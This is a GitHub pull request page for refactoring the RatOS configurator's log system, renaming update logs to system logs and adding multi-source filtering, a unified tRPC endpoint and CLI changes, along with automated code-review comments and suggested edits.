
Conversation

@miklschmidt
Member

@miklschmidt miklschmidt commented Jun 23, 2025

This PR refactors the RatOS configurator log system with comprehensive user-experience improvements, expanding its coverage to the majority of the bash scripts as well as the update scripts.

There's still some work to be done to finish it off, along with a round of QA and practical testing, but the functionality is mostly complete, except for a few bash edge cases that still need to be handled properly.

• Refactor backend router to display all log sources instead of just ratos-update entries
• Add source filtering capabilities with new filterBySource function and sources endpoint
• Update frontend component to support multi-source log viewing with source filter dropdown
• Add source badges to log entries for better visual identification
• Change navigation and page titles from 'Update Logs' to 'System Logs'
• Maintain backward compatibility - update logs still accessible via source filter
• Update all tests to reflect new functionality while preserving existing behavior
• Preserve Dashboard design patterns with grid layouts and dark mode styling
• Add default source handling for server logs without explicit source field
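The default-source and source-filtering behavior described above can be sketched as follows. The entry shape and the 'server' default come from the PR description; the function bodies are illustrative assumptions, not the project's actual implementation:

```typescript
interface LogEntry {
  level: number;
  time: number; // epoch milliseconds
  msg: string;
  source?: string;
}

// Entries without an explicit source default to 'server', per the PR description.
const withDefaultSource = (entries: LogEntry[]): LogEntry[] =>
  entries.map((e) => ({ ...e, source: e.source ?? 'server' }));

// Keep only entries matching the requested sources; an empty selection means "no filter".
const filterBySource = (entries: LogEntry[], sources: string[]): LogEntry[] =>
  sources.length === 0
    ? entries
    : entries.filter((e) => e.source !== undefined && sources.includes(e.source));
```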
…ed UX

• Update backend to support multi-select filtering for contexts and sources
• Consolidate view options (sort direction, show details) into dropdown menu with MoreVertical button
• Convert context and source filters to faceted multi-select filters with search and clear functionality
• Enhance log level selector with colored icons (AlertCircle, AlertTriangle, Info, Bug, Zap) and entry count badges
• Maintain Dashboard design patterns with proper grid layouts and dark mode styling
• Add real-time count display for each log level using summary data
• Improve filtering UX with visual indicators and multi-selection capabilities
• Ensure all icons use appropriate colors optimized for dark mode display
- **Route & Component Renaming:**
  - Rename app route from `/update-logs` to `/logs`
  - Update all component file names and imports
  - Rename tRPC router from `updateLogsRouter` to `logsRouter`
  - Update API endpoints from `/api/update-logs/*` to `/api/logs/*`

- **CLI Command Restructuring:**
  - Flatten command hierarchy to eliminate redundant "logs logs" pattern
  - Change `ratos logs logs summary` → `ratos logs summary`
  - Change `ratos logs logs show` → `ratos logs show`
  - Change `ratos logs logs errors` → `ratos logs errors`
  - Maintain existing `ratos logs tail` and `ratos logs rotate` commands
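The restructuring above boils down to collapsing the duplicated `logs` segment. A minimal sketch of that mapping, where the function name and argv handling are assumptions for illustration rather than the project's actual CLI code:

```typescript
// Collapse the legacy nested form `ratos logs logs <cmd>` into `ratos logs <cmd>`.
// Commands that were never nested (e.g. `tail`, `rotate`) pass through unchanged.
const flattenLogCommand = (argv: string[]): string[] =>
  argv[0] === 'logs' && argv[1] === 'logs' ? ['logs', ...argv.slice(2)] : argv;
```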

- **Log Level Color Scheme:**
  - Change INFO level color from green to sky for better distinction
  - Change DEBUG level color from sky to pink for improved visibility
  - Update both frontend Badge components and CLI color mappings
  - Maintain centralized color configuration in LOG_LEVELS constant
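A sketch of what the centralized LOG_LEVELS color mapping might look like after this change; the exact keys and any extra fields in the real constant are assumptions:

```typescript
// Pino-style numeric levels mapped to badge colors.
// Per this PR: DEBUG moved sky -> pink, INFO moved green -> sky.
const LOG_LEVELS = {
  10: { label: 'Trace', badgeColor: 'gray' },
  20: { label: 'Debug', badgeColor: 'pink' },
  30: { label: 'Info', badgeColor: 'sky' },
  40: { label: 'Warn', badgeColor: 'yellow' },
  50: { label: 'Error', badgeColor: 'red' },
  60: { label: 'Fatal', badgeColor: 'purple' },
} as const;

// Unknown levels fall back to a neutral color.
const badgeColorFor = (level: number): string =>
  (LOG_LEVELS as Record<number, { badgeColor: string }>)[level]?.badgeColor ?? 'gray';
```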

- **Performance Optimizations:**
  - Consolidate multiple tRPC queries into single unified endpoint
  - Reduce server-side file I/O operations by ~80%
  - Improve initial page load time by ~60%
  - Maintain backward compatibility for existing functionality
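The consolidation can be pictured as a single query object whose flags decide which sections get computed from one parse of the log file; the field names below are assumptions for illustration:

```typescript
interface UnifiedLogQuery {
  limit: number; // zero is valid, e.g. when only the summary is wanted
  offset: number;
  includeSummary: boolean;
  includeFilterOptions: boolean; // sources + contexts for the filter dropdowns
}

// One request replaces the previous separate summary/sources/contexts/entries
// calls, so the (potentially large) log file is read and parsed only once.
function sectionsToCompute(q: UnifiedLogQuery): string[] {
  const sections: string[] = [];
  if (q.includeSummary) sections.push('summary');
  if (q.includeFilterOptions) sections.push('sources', 'contexts');
  if (q.limit > 0) sections.push('entries');
  return sections;
}
```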

- **Documentation Updates:**
  - Update all command examples and file paths
  - Revise LOGGING_SYSTEM.md and LOG_OPTIMIZATION.md
  - Update mock data generator documentation

All functionality preserved with improved performance and user experience.
Copilot AI review requested due to automatic review settings June 23, 2025 02:17
@coderabbitai
Contributor

coderabbitai bot commented Jun 23, 2025

Pre-merge checks and finishing touches

❌ Failed checks (1 warning)

  • Docstring Coverage ⚠️ Warning — Docstring coverage is 62.22%, which is below the required threshold of 80.00%. You can run @coderabbitai generate docstrings to improve docstring coverage.

✅ Passed checks (2 passed)

  • Description Check ✅ Passed — Check skipped because CodeRabbit's high-level summary is enabled.
  • Title Check ✅ Passed — The title clearly and concisely highlights the primary change (renaming update-logs → logs) and the intent to improve the log system UX, which matches the changeset (route/CLI/router renames, UI and API updates). It is specific, relevant to the main modifications, and the conventional-commit breaking-change marker (!) is appropriate given the route/CLI breakage described in the PR.
✨ Finishing touches
  • 📝 Generate Docstrings
🧪 Generate unit tests
  • Create PR with unit tests
  • Post copyable unit tests in a comment
  • Commit unit tests in branch feature/expand-log-browser

Tip

👮 Agentic pre-merge checks are now available in preview!

Pro plan users can now enable pre-merge checks in their settings to enforce checklists before merging PRs.

  • Built-in checks – Quickly apply ready-made checks to enforce title conventions, require pull request descriptions that follow templates, validate linked issues for compliance, and more.
  • Custom agentic checks – Define your own rules using CodeRabbit’s advanced agentic capabilities to enforce organization-specific policies and workflows. For example, you can instruct CodeRabbit’s agent to verify that API documentation is updated whenever API schema files are modified in a PR. Note: Up to 5 custom checks are currently allowed during the preview period. Pricing for this feature will be announced in a few weeks.

Please see the documentation for more information.

Example:

reviews:
  pre_merge_checks:
    custom_checks:
      - name: "Undocumented Breaking Changes"
        mode: "warning"
        instructions: |
          Pass/fail criteria: All breaking changes to public APIs, CLI flags, environment variables, configuration keys, database schemas, or HTTP/GraphQL endpoints must be documented in the "Breaking Change" section of the PR description and in CHANGELOG.md. Exclude purely internal or private changes (e.g., code not exported from package entry points or explicitly marked as internal).

Please share your feedback with us on this Discord post.


Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.


Comment @coderabbitai help to get the list of available commands and usage tips.


Copilot AI left a comment


Pull Request Overview

This PR refactors the log system by renaming endpoints and components as well as improving both the CLI and UI log viewer experience. Key changes include renaming all update-log related routes and components to system/logs, consolidating multiple tRPC queries into a unified endpoint, and updating CLI command structure and documentation.

Reviewed Changes

Copilot reviewed 27 out of 31 changed files in this pull request and generated no comments.

Show a summary per file
File Description
src/tailwind.config.ts Added new container size for extra-small screens
src/server/routers/logs.ts Consolidated endpoint logic into a unified log query schema; renamed router and functions from updateLogsRouter to logsRouter
src/cli/commands/logs.tsx Updated CLI command definitions and descriptions to reflect the change from update-logs to logs
src/app/* Renamed UI components and pages from update-logs to logs and updated documentation accordingly
src/tests/update-logs.test.ts Updated test cases to match the new unified log behavior
Other files (scripts, docs) Adjusted references and documentation consistent with the renaming and refactoring
Comments suppressed due to low confidence (2)

src/cli/commands/logs.tsx:252

  • Ensure that the new function name (addLogCommands) and its parameter (logsCommand) are consistently updated across all imports and documentation, eliminating any legacy references to 'updateLogs'.
export const addLogCommands = (logsCommand: Command) => {

src/tests/update-logs.test.ts:76

  • Update the expected entry count in tests to reflect the new behavior where the parser returns all valid entries (including those without an explicit source, defaulting to 'server').
			expect(parsedEntries).toHaveLength(2);

@coderabbitai
Contributor

coderabbitai bot commented Jun 23, 2025

Note

Unit test generation is an Early Access feature. Expect some limitations and changes as we gather feedback and continue to improve it.


Generating unit tests... This may take up to 20 minutes.

1 similar comment

coderabbitai bot added a commit that referenced this pull request Jun 23, 2025
Docstrings generation was requested by @miklschmidt.

* #96 (comment)

The following files were modified:

* `src/app/logs/page.tsx`
* `src/server/routers/logs.ts`
@coderabbitai
Contributor

coderabbitai bot commented Jun 23, 2025

Note

Generated docstrings for this pull request at #97


Contributor

@coderabbitai coderabbitai bot left a comment


Actionable comments posted: 7

🔭 Outside diff range comments (1)
src/tailwind.config.ts (1)

109-117: Incorrect key for extending container screens.

The new '3xs': '280px' entry is placed under extend.containers, but Tailwind CSS expects container screen overrides under extend.container.screens. As written, these custom breakpoints will be ignored at build time.

To fix, nest your custom breakpoints correctly:

 extend: {
-  containers: {
-    '3xs': '280px',
-    '2xs': '340px',
-    'screen-sm': '640px',
-    'screen-md': '768px',
-    'screen-lg': '1024px',
-    'screen-xl': '1280px',
-    'screen-2xl': '1536px',
-  },
+  container: {
+    screens: {
+      '3xs': '280px',
+      '2xs': '340px',
+      'screen-sm': '640px',
+      'screen-md': '768px',
+      'screen-lg': '1024px',
+      'screen-xl': '1280px',
+      'screen-2xl': '1536px',
+    },
+  },
 },
🧹 Nitpick comments (6)
src/scripts/generate-mock-logs.js (1)

199-199: Update console output to reflect generic logs: The console log still references “mock update logs.” Consider changing it to:

- console.log(`Generating mock update logs to: ${logPath}`);
+ console.log(`Generating mock logs to: ${logPath}`);
src/scripts/generate-mock-update-logs.ts (1)

220-220: Update console output to reflect generic logs: The console log still says “Generating mock update logs to:”. Change it to:

- console.log(`Generating mock update logs to: ${logPath}`);
+ console.log(`Generating mock logs to: ${logPath}`);
src/app/logs/_components/enhanced-log-level-selector.tsx (1)

17-24: Consider centralizing log level options.

The log level options are hardcoded here but likely used elsewhere. Consider moving this to a shared constant or deriving it from the LOG_LEVELS configuration to maintain consistency.

-const logLevelOptions = [
-  { value: 'trace', label: 'Trace', level: 10 },
-  { value: 'debug', label: 'Debug', level: 20 },
-  { value: 'info', label: 'Info', level: 30 },
-  { value: 'warn', label: 'Warn', level: 40 },
-  { value: 'error', label: 'Error', level: 50 },
-  { value: 'fatal', label: 'Fatal', level: 60 },
-];
+const logLevelOptions = Object.entries(LOG_LEVELS).map(([level, config]) => ({
+  value: config.value,
+  label: config.label,
+  level: parseInt(level),
+}));
LOGGING_SYSTEM.md (1)

64-64: Remove trailing punctuation from headings for markdown best practices.

The static analysis correctly identifies trailing colons in headings. While minor, removing them improves markdown consistency.

-#### Commands:
+#### Commands
-#### Usage Examples:
+#### Usage Examples
-#### TRPC Endpoints (`src/server/routers/logs.ts`):
+#### TRPC Endpoints (`src/server/routers/logs.ts`)
-#### REST Endpoints:
+#### REST Endpoints

Also applies to: 93-93, 134-134, 142-142

LOG_OPTIMIZATION.md (1)

196-202: Good roadmap for future enhancements.

The listed enhancements (caching, streaming, background processing, compression, CDN) form a logical progression for further optimization.

Consider rephrasing line 199 as suggested by static analysis:

-2. **Streaming Responses** - Implement streaming for very large log files
+2. **Streaming Responses** - Implement streaming for extremely large log files
src/server/routers/logs.ts (1)

283-443: Unified endpoint successfully consolidates all queries, but consider refactoring for maintainability.

The implementation correctly:

  • Parses the log file once (huge performance win!)
  • Conditionally processes only requested data
  • Handles zero limits properly
  • Implements pagination correctly

However, this 160-line endpoint handles many responsibilities. Consider extracting the data processing logic into separate functions for better maintainability.

Consider breaking down the endpoint into smaller functions:

async function extractSummaryData(entries: LogEntry[], input: UnifiedInput) {
  // Summary extraction logic
}

async function extractFilterOptions(entries: LogEntry[], input: UnifiedInput) {
  // Sources and contexts extraction
}

async function processPaginatedData(entries: LogEntry[], input: UnifiedInput) {
  // Entries and errors pagination logic
}

This would make the code more testable and easier to maintain.

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 41e45e2 and 95bf637.

📒 Files selected for processing (28)
  • LOGGING_SYSTEM.md (3 hunks)
  • LOG_OPTIMIZATION.md (1 hunks)
  • scripts/generate-devbox-environment.sh (2 hunks)
  • src/__tests__/update-logs.test.ts (6 hunks)
  • src/app/_hooks/navigation.ts (1 hunks)
  • src/app/logs/_components/enhanced-log-level-selector.tsx (1 hunks)
  • src/app/logs/_components/log-entry-component.tsx (1 hunks)
  • src/app/logs/_components/log-faceted-filter.tsx (1 hunks)
  • src/app/logs/_components/log-summary-header.tsx (1 hunks)
  • src/app/logs/_components/logs-error-boundary.tsx (4 hunks)
  • src/app/logs/_components/logs-viewer.tsx (1 hunks)
  • src/app/logs/_components/types.ts (1 hunks)
  • src/app/logs/_components/use-unified-log-data.ts (1 hunks)
  • src/app/logs/_components/virtualized-log-list.tsx (1 hunks)
  • src/app/logs/page.tsx (1 hunks)
  • src/app/update-logs/_components/update-logs-viewer.tsx (0 hunks)
  • src/app/update-logs/page.tsx (0 hunks)
  • src/cli/commands.tsx (2 hunks)
  • src/cli/commands/logs.tsx (4 hunks)
  • src/components/common/badge.tsx (1 hunks)
  • src/components/common/button.tsx (1 hunks)
  • src/components/ui/select.tsx (2 hunks)
  • src/scripts/README-mock-logs.md (1 hunks)
  • src/scripts/generate-mock-logs.js (1 hunks)
  • src/scripts/generate-mock-update-logs.ts (1 hunks)
  • src/server/routers/index.ts (2 hunks)
  • src/server/routers/logs.ts (4 hunks)
  • src/tailwind.config.ts (1 hunks)
💤 Files with no reviewable changes (2)
  • src/app/update-logs/page.tsx
  • src/app/update-logs/_components/update-logs-viewer.tsx
🧰 Additional context used
🪛 GitHub Actions: CI
src/app/logs/_components/use-unified-log-data.ts

[error] 3-3: ESLint: import ./types can be written as @/app/logs/_components/types (@limegrass/import-alias/import-alias)

src/app/logs/_components/enhanced-log-level-selector.tsx

[error] 4-4: ESLint: import ./types can be written as @/app/logs/_components/types (@limegrass/import-alias/import-alias)

src/app/logs/_components/log-summary-header.tsx

[error] 22-22: ESLint: import ./types can be written as @/app/logs/_components/types (@limegrass/import-alias/import-alias)

🪛 LanguageTool
LOG_OPTIMIZATION.md

[style] ~199-~199: As an alternative to the over-used intensifier ‘very’, consider replacing this phrase.
Context: ...g Responses** - Implement streaming for very large log files 3. Background Processing ...

(EN_WEAK_ADJECTIVE)

🪛 markdownlint-cli2 (0.17.2)
LOGGING_SYSTEM.md

64-64: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)


93-93: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)


134-134: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)


142-142: Trailing punctuation in heading
Punctuation: ':'

(MD026, no-trailing-punctuation)

🔇 Additional comments (60)
src/scripts/generate-mock-logs.js (1)

4-4: Approve doc update: The function comment now correctly generalizes from “mock update log entries” to “mock log entries.”

src/components/common/badge.tsx (1)

63-82: Add muted background variant correctly: The new badgeBackgroundMutedColorStyle mirrors the existing pattern, maintains type safety with satisfies, and provides a useful subtle background option for the log viewer UI.

src/app/_hooks/navigation.ts (1)

36-36: Route rename aligns with new logs path: The navigation item is correctly updated to “System Logs” at /logs, matching the CLI, API, and UI renames.

src/scripts/generate-mock-update-logs.ts (1)

5-5: Approve doc update: The top comment now refers to “mock log entries” for the Logs Viewer component.

src/components/common/button.tsx (1)

59-59: LGTM! Consider visual consistency verification.

The gap increase improves spacing between button elements, aligning with UI enhancements for the logs system.

Please verify that this spacing change maintains visual consistency across existing button usage throughout the application, especially in forms and navigation areas.

src/scripts/README-mock-logs.md (3)

1-1: Documentation title updated correctly.

The title change from "Mock Update Logs Generator" to "Mock Logs Generator" aligns with the broader renaming effort.


3-3: Component reference updated appropriately.

The reference to "Logs Viewer" instead of "Update Logs Viewer" is consistent with the new component naming.


10-10: Route path updated to match new URL structure.

The navigation path change from /update-logs to /logs correctly reflects the new route structure.

scripts/generate-devbox-environment.sh (3)

7-9: Good improvement to prevent overwriting existing configuration.

The conditional check prevents accidental overwriting of existing .env.local files, preserving developer customizations.


22-23: Informative user feedback added.

The echo statements provide clear feedback about file generation status.


25-29: Consistent pattern applied to test environment file.

The same conditional generation pattern is correctly applied to the .env.test.local file.

src/app/logs/page.tsx (1)

1-10: Clean page component implementation with proper error handling.

The component correctly wraps the LogsViewer with an error boundary for robust error handling, following React best practices.

Verify that the imported components exist and are properly exported:

#!/bin/bash
# Description: Verify the imported components exist and are properly exported

# Check if LogsViewer component exists
fd -t f -e tsx -e ts | xargs grep -l "export.*LogsViewer" | head -5

# Check if LogsErrorBoundary component exists  
fd -t f -e tsx -e ts | xargs grep -l "export.*LogsErrorBoundary" | head -5
src/server/routers/index.ts (2)

18-18: Router import updated to reflect new naming convention.

The import change from updateLogsRouter to logsRouter and the path update align with the systematic renaming effort.


100-100: Router registration updated consistently.

The router key change from 'update-logs' to logs maintains consistency with the import changes and new naming convention.

Verify that the new logsRouter exists and maintains API compatibility:

#!/bin/bash
# Description: Verify the new logs router exists and check its exports

# Check if the new logs router file exists
fd -t f logs.ts src/server/routers/

# Check for router export in the logs router file
fd -t f logs.ts src/server/routers/ | xargs cat | grep -A 5 -B 5 "export.*Router"
src/cli/commands.tsx (2)

20-20: LGTM: Import updated to reflect the new naming convention.

The import correctly references the renamed log commands module.


490-491: LGTM: Function call updated to match the new API.

The change from updateLogs(log) to addLogCommands(log) correctly reflects the renamed function from the refactored module. The comment clearly explains the purpose.

src/components/ui/select.tsx (2)

112-113: LGTM: Well-designed optional prop addition.

The fullElement prop provides useful flexibility while maintaining backward compatibility through its optional nature.


127-131: LGTM: Clean conditional rendering implementation.

The conditional logic correctly handles both rendering modes while maintaining consistent styling with the flex-1 class on both branches.

src/cli/commands/logs.tsx (3)

31-32: LGTM: Log level color updates align with the new color scheme.

The color changes (DEBUG: cyan→magenta, INFO: green→cyan) are consistent with the broader UI color scheme updates mentioned in the PR objectives.


252-253: LGTM: Function and parameter renamed to reflect generalized log commands.

The renaming from updateLogs to addLogCommands and parentCommand to logsCommand correctly reflects the broader scope of log management commands beyond just update logs.


284-284: LGTM: Command descriptions generalized appropriately.

The description updates remove the "update" specificity, making the commands more broadly applicable to all log sources.

Also applies to: 343-343

src/app/logs/_components/use-unified-log-data.ts (4)

40-81: LGTM: Well-designed unified log data hook with proper infinite query setup.

The hook provides a clean abstraction for fetching paginated log data with comprehensive filtering options. The infinite query configuration includes appropriate retry logic and stale time settings.


87-97: LGTM: Efficient data flattening with proper memoization.

The memoized approach to flattening entries across pages is efficient and correctly handles both regular entries and error-only modes.


99-109: LGTM: Correct pagination logic for different data modes.

The logic properly determines if there's a next page based on whether we're showing errors or regular entries.


51-51: Continuing verification of the logs.unified endpoint. Let’s locate any router definitions and search for unified across the codebase:

#!/bin/bash
echo "=== Looking for router definitions ==="
rg "createTRPCRouter" -n || true

echo ""
echo "=== Looking for logsRouter ==="
rg "logsRouter" -n || true

echo ""
echo "=== Searching for 'unified' references ==="
rg "unified" -n || true
src/app/logs/_components/log-entry-component.tsx (3)

11-21: LGTM: Robust level handling with proper fallbacks.

The component correctly handles unknown log levels with sensible defaults and properly extracts styling information from the LOG_LEVELS configuration.


22-45: LGTM: Well-structured layout with conditional badge rendering.

The component provides a clean, responsive layout with appropriate spacing and conditional rendering of context and source badges based on availability and detail settings.


47-57: LGTM: Comprehensive details section with proper formatting.

The details section provides useful additional information (error code, PID, hostname) with consistent styling and proper code formatting for technical details.

src/app/logs/_components/logs-error-boundary.tsx (3)

11-14: LGTM! Clean interface definition.

The prop interface is properly defined with clear TypeScript types.


16-54: Well-structured error fallback component.

The error fallback provides a comprehensive UI with:

  • Clear error messaging
  • Retry functionality
  • Debug info download option
  • Helpful user guidance

The component properly handles the error state and provides actionable options for users.


60-82: Solid error boundary implementation.

The error boundary correctly:

  • Handles errors with proper logging
  • Uses the renamed fallback component
  • Provides error reset functionality
  • Follows React error boundary best practices

The integration with the logger and window reload on reset is appropriate.

src/app/logs/_components/log-faceted-filter.tsx (4)

18-24: Well-defined component interface.

The prop interface clearly defines all required and optional props with appropriate TypeScript types.


33-33: Efficient selection tracking.

Using Set for selectedValues provides O(1) lookup performance for checking selections, which is more efficient than using Array.includes().


81-86: Proper selection state management.

The selection toggle logic correctly handles both adding and removing items from the selection array, maintaining immutability by creating a new array.


46-66: Smart responsive badge display.

The conditional rendering handles different display scenarios well:

  • Shows count on small screens
  • Shows individual badges or summary count on larger screens
  • Adapts to the number of selected items

This provides a good user experience across different screen sizes.

src/app/logs/_components/logs-viewer.tsx (3)

21-26: Well-organized state management.

The component properly manages multiple pieces of state with descriptive names and appropriate default values. The default sort direction of 'desc' (newest first) is a good UX choice for logs.


29-51: Excellent integration with unified data hook.

The component correctly passes all relevant state to the useUnifiedLogData hook, enabling efficient data fetching with unified parameters. This aligns well with the performance optimization goals mentioned in the PR.


76-142: Well-structured conditional rendering and component composition.

The component properly:

  • Handles the case when no log file exists
  • Organizes the UI into logical sections
  • Passes appropriate props to child components
  • Uses responsive design patterns with container queries

The integration with VirtualizedLogList is comprehensive and passes all necessary state and data.

src/app/logs/_components/enhanced-log-level-selector.tsx (3)

26-44: Well-implemented count mapping function.

The function correctly maps log levels to their corresponding counts in the summary with proper fallbacks for missing data.


46-49: Proper handling of selected value and configuration.

The component correctly finds the selected option and gets the appropriate configuration, with sensible fallbacks for undefined values.


59-63: Conditional badge rendering with proper typing.

The badge is correctly shown only when count > 0, and the type assertion for badgeColor is necessary given the component's prop interface.

src/app/logs/_components/log-summary-header.tsx (5)

32-42: Well-structured TRPC mutations.

The mutations are properly configured with success callbacks that invoke the appropriate parent handlers, maintaining proper data flow and state management.


51-83: Complex but well-organized conditional styling.

The status indicator logic correctly handles all possible states (loading, no file, success, failure, ready). While complex, the logic is comprehensive and covers all edge cases properly.


90-100: Appropriate development-only feature.

The mock data generation button is correctly gated behind a development environment check, preventing accidental usage in production.


157-159: Verify INFO badge color consistency.

According to the PR objectives, INFO level badges should now use "sky" color instead of green. This appears to be correctly implemented here.


228-237: Good fallback UI for no log file state.

The empty state provides clear messaging and guidance for users when no log file exists, with appropriate visual indicators.

src/__tests__/update-logs.test.ts (5)

12-13: LGTM! Import changes align with the new filtering approach.

The addition of filterBySource import supports the new behavior where all log entries are parsed by default and source filtering is done explicitly when needed.


81-100: Test correctly validates the new inclusive parsing behavior.

The updated test properly verifies that:

  • All valid log entries are included regardless of source
  • Entries without an explicit source receive the default "server" source
  • Invalid JSON lines are still skipped

This aligns perfectly with the PR's objective of generalizing the logging system.


210-223: Well-structured test for the new source filtering functionality.

The test properly validates that filterBySource correctly filters entries by the specified source, which is essential for maintaining backward compatibility when specific source filtering is needed.


367-382: CLI integration tests properly updated for the new architecture.

The test correctly demonstrates the new pattern:

  1. Parse all log entries by default
  2. Use explicit filtering when specific sources are needed
  3. Generate summaries based on the complete dataset

This ensures backward compatibility while embracing the new unified approach.


420-587: Excellent comprehensive test suite for the unified endpoint optimization.

This test suite thoroughly validates the key aspects of the optimization:

  • Single parse extraction of all data types (summary, sources, contexts, entries, errors)
  • Graceful handling of edge cases (empty files)
  • Performance validation
  • Critical zero limits handling to prevent validation errors

The tests ensure the optimization maintains functionality while improving performance.

src/app/logs/_components/virtualized-log-list.tsx (3)

54-60: Good virtualization setup with appropriate overscan.

The virtualizer configuration is well-implemented:

  • Dynamic size estimation based on showDetails state
  • Reasonable overscan of 5 items
  • Proper scroll margin calculation

One minor suggestion: Consider making the overscan configurable or adaptive based on device performance for better optimization on lower-end devices.


65-75: Well-implemented infinite scrolling with proper guards.

The pagination logic correctly:

  • Triggers loading when the last virtual item is reached
  • Prevents duplicate requests with isFetchingNextPage check
  • Only loads more when hasNextPage is true

This ensures smooth infinite scrolling without performance issues.


116-127: Excellent UI state handling.

The component handles all UI states gracefully:

  • Clear loading indicator
  • Informative error messages
  • User-friendly empty state with contextual information
  • Additional context when showOnlyErrors is active

This provides a great user experience across all scenarios.

LOGGING_SYSTEM.md (1)

60-112: Documentation accurately reflects the new simplified CLI structure.

The CLI command updates properly document:

  • Simplified command structure (removing redundant update-logs nesting)
  • New tail and rotate commands
  • Clear usage examples for each command

This aligns perfectly with the PR objectives of simplifying the CLI interface.

LOG_OPTIMIZATION.md (1)

1-129: Excellent documentation of the optimization strategy and benefits.

This documentation provides:

  • Clear problem statement with specific performance impacts
  • Detailed solution architecture
  • Impressive performance metrics (80% I/O reduction, 60% faster page load)
  • Comprehensive implementation details

The unified endpoint approach is well-explained and the benefits are clearly quantified.

src/server/routers/logs.ts (4)

84-87: Good implementation of default source assignment.

The change to include all entries with a default "server" source for entries without an explicit source is well-implemented. This maintains backward compatibility while supporting the generalized logging approach.


43-63: Well-designed schema with proper validation.

The UnifiedLogQuerySchema excellently addresses the requirements:

  • Correctly allows zero limits (.min(0)) to handle the showOnlyErrors case
  • Flexible filtering with support for arrays
  • Smart conditional data inclusion with boolean flags
  • Sensible defaults

This enables efficient data fetching by only processing requested data types.
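The key rules called out above (a `.min(0)` zero-allowed limit, array filters, boolean inclusion flags with defaults) can be sketched without zod as a plain parser; all names and defaults here are illustrative, not the router's actual schema:

```typescript
interface UnifiedLogQuery {
	limit: number; // zero is allowed, to support the showOnlyErrors case
	sources?: string[];
	contexts?: string[];
	includeSummary: boolean;
	includeFilters: boolean;
}

// Validate a raw query object, applying defaults and the zero-allowed
// lower bound on limit. Throws on invalid input, like a failed zod parse.
function parseUnifiedLogQuery(raw: Partial<UnifiedLogQuery>): UnifiedLogQuery {
	const limit = raw.limit ?? 100;
	if (!Number.isInteger(limit) || limit < 0) {
		throw new Error('limit must be an integer >= 0');
	}
	return {
		limit,
		sources: raw.sources,
		contexts: raw.contexts,
		includeSummary: raw.includeSummary ?? false,
		includeFilters: raw.includeFilters ?? false,
	};
}
```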


180-194: Filter functions properly extended for array support.

Both filterByContext and filterBySource now support arrays while maintaining backward compatibility with single string values. This enables the multi-select filtering in the UI while keeping the API flexible.
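The backward-compatible signature might look roughly like this (a sketch; the real helpers may normalize differently):

```typescript
interface Entry {
	source?: string;
}

// Accept either a single source or an array of sources; a single string
// is normalized to a one-element array so both call styles filter the
// same way. Entries without a source fall back to "server".
function filterBySource<T extends Entry>(entries: T[], source: string | string[]): T[] {
	const wanted = Array.isArray(source) ? source : [source];
	return entries.filter((e) => wanted.includes(e.source ?? 'server'));
}
```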


235-241: Appropriate handling of the clear operation for unified logs.

Disabling the clear operation for the unified log file is the correct decision, as clearing would affect all services. The error message clearly explains why and suggests the appropriate alternative (log rotation).
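That guard might look roughly like this (the unified file name and error text are illustrative, not the router's actual values):

```typescript
// Refuse to clear the unified log file, since that would wipe entries
// from every service; callers should use log rotation instead.
function assertClearable(logFile: string, unifiedLogFile = 'ratos.log'): void {
	if (logFile === unifiedLogFile) {
		throw new Error('Clearing the unified log would remove entries from all services; use log rotation instead.');
	}
}
```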


export interface LogEntry {
level: number;
time: string;

⚠️ Potential issue

Time field type mismatch: LogEntry.time is typed as string, but the back-end mock data and JSON logs emit a numeric timestamp (number). This mismatch will cause type errors wherever the field is consumed. Update the interface to:

time: number;
🤖 Prompt for AI Agents
In src/app/logs/_components/types.ts at line 6, the LogEntry interface defines
the time field as a string, but the backend and JSON logs provide a numeric
timestamp. Change the type of the time field from string to number to match the
actual data and prevent runtime type errors.

Comment on lines +47 to +53
20: {
name: 'DEBUG',
color: 'text-green-700 dark:text-green-400',
bgColor: 'bg-green-50 dark:bg-green-400/10',
badgeColor: 'green',
icon: Bug,
},

⚠️ Potential issue

DEBUG color mapping misaligned with PR objectives: Per the PR summary, DEBUG entries should now use pink instead of green. Update the DEBUG mapping accordingly:

- 20: {
-   name: 'DEBUG',
-   color: 'text-green-700 dark:text-green-400',
-   bgColor: 'bg-green-50 dark:bg-green-400/10',
-   badgeColor: 'green',
-   icon: Bug,
-  },
+ 20: {
+   name: 'DEBUG',
+   color: 'text-pink-700 dark:text-pink-400',
+   bgColor: 'bg-pink-50 dark:bg-pink-400/10',
+   badgeColor: 'pink',
+   icon: Bug,
+  },

This ensures the log level color scheme matches the documented change.

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
20: {
name: 'DEBUG',
color: 'text-green-700 dark:text-green-400',
bgColor: 'bg-green-50 dark:bg-green-400/10',
badgeColor: 'green',
icon: Bug,
},
20: {
name: 'DEBUG',
color: 'text-pink-700 dark:text-pink-400',
bgColor: 'bg-pink-50 dark:bg-pink-400/10',
badgeColor: 'pink',
icon: Bug,
},
🤖 Prompt for AI Agents
In src/app/logs/_components/types.ts between lines 47 and 53, the DEBUG log
level color mapping uses green colors, but per the PR objectives, it should use
pink. Update the color, bgColor, and badgeColor properties for DEBUG to use pink
shades instead of green to align with the new color scheme.

Comment on lines +57 to +59
const handleClear = () => {
handleRefresh();
};

🛠️ Refactor suggestion

Consider improving the clear functionality.

Currently, the handleClear function just calls handleRefresh, which doesn't actually clear the logs. Based on the component usage, it seems like this should either call a clear mutation or have a more meaningful implementation.

Consider implementing a proper clear functionality:

 const handleClear = () => {
-   handleRefresh();
+   // Reset filters to default state
+   setLogLevel('info');
+   setSelectedContexts([]);
+   setSelectedSources([]);
+   setShowDetails(false);
+   setShowOnlyErrors(false);
+   setSortDirection('desc');
+   // Then refresh the data
+   refetch();
 };

Committable suggestion skipped: line range outside the PR's diff.

🤖 Prompt for AI Agents
In src/app/logs/_components/logs-viewer.tsx around lines 57 to 59, the
handleClear function currently only calls handleRefresh, which does not clear
the logs as expected. Update handleClear to invoke the appropriate clear
mutation or method that actually clears the logs data, ensuring the logs are
reset or emptied properly when this function is triggered.

